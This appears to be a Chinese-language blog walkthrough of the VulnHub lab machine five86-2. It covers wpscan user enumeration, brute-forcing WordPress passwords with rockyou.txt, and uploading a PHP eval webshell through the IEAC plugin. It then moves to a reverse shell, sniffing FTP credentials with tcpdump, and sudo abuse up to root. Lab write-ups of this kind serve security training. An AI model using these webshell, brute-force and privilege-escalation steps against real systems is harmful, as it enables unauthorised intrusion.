下载地址:
1、 链接:https://pan.baidu.com/s/1Q33O_3vbnHbPoi4qMbFlog
提取码:h3um
2、http://www.vulnhub.com/entry/five86-2,418/
靶机:five86-2(VMware桥接) IP:192.168.10.90
攻击机:Kali(VMware桥接) IP:192.168..10.81
1、使用nmap扫描目标系统,查看操作系统指纹和运行端口等情况,开放了20、21、80端口,80端口为wordpress5.1.4版本
2、访问80端口web应用,CMS版本为WordPress5.1.4
3、可先利用wpscan工具扫描目标,wpscan是一款针对WordPress的扫描器。
默认扫描会返回目标站点的中间件、XML-RPC、readme文件、上传路径、WP-Corn、版本、主题、所有的插件和备份文件。
命令wpscan --url http://192.168.10.90
枚举用户,爆出五个用户。
wpscan --url http://192.168.10.90/ --enumerate u
4、将爆出的用户名保存到user.txt文件中,利用kali中的rockyou.txt字典爆破密码
wpscan –url http://192.168.10.90 -U user.txt -P /usr/share/wordlists/rockyou.txt
5、访问/wp-admin/后台登陆,使用barney用户登陆
登陆后在Plugins插件部分可看到安装了三个插件,但是只有IEAC激活了。
6、可以搜一下wordpress插件IEAC漏洞利用的方法,在exploit-db中也有
7、生成poc.zip
echo "<html>hello</html>" > index.html
echo "<?php eval($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
8、登陆后选择文章->新建文章
添加区块->e-learning
上传poc
选择iFrame
返回的为上传的shell的地址
9、
10、利用kali中php-reverse-shell脚本反弹shell或利用webshell管理工具进行反弹
再次进行zip压缩进行反弹shell
http://192.168.10.90/wp-content/uploads/articulate_uploads/shell/shell.php
11、ls /home 目录下有8个目录,其中包含之前爆破出的stephen用户,输入密码apollo1,切换用户
12、切换成交互shell,发现stephen用户在一个pcap用户组中
13、sudo -l需要密码,输入apollo1密码不对
14、然后分析一下pcap,在这可能是要进行浏览分析
15、tcpdump -D 即使在低特权下,tcpdump仍具有捕获所有网络浏览的功能
16、检查”veth2f22eb7”流量,并保存在pcap文件1.pcap
抓包命令:timeout 120 tcpdump -w 1.pcap -i veth2ff2eb7(先切换到tmp目录)
timeout 120为2分钟,-w将结果输出到文件,-i是指定监听端口
17、tcpdump -r 1.pcap 用-r读取流量包中的数据
在数据包中找到ftp用户paul 密码是esomepasswford
18、切换paul用户,查看sudo权限,paul可以使用peter的service命令
19、直接执行peter的/bin/bash,,用相对目录找到/bin/bash的位置
20、peter可以运行root用户的passwd命令,直接修改root密码
21、在root目录下找到flag
508
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
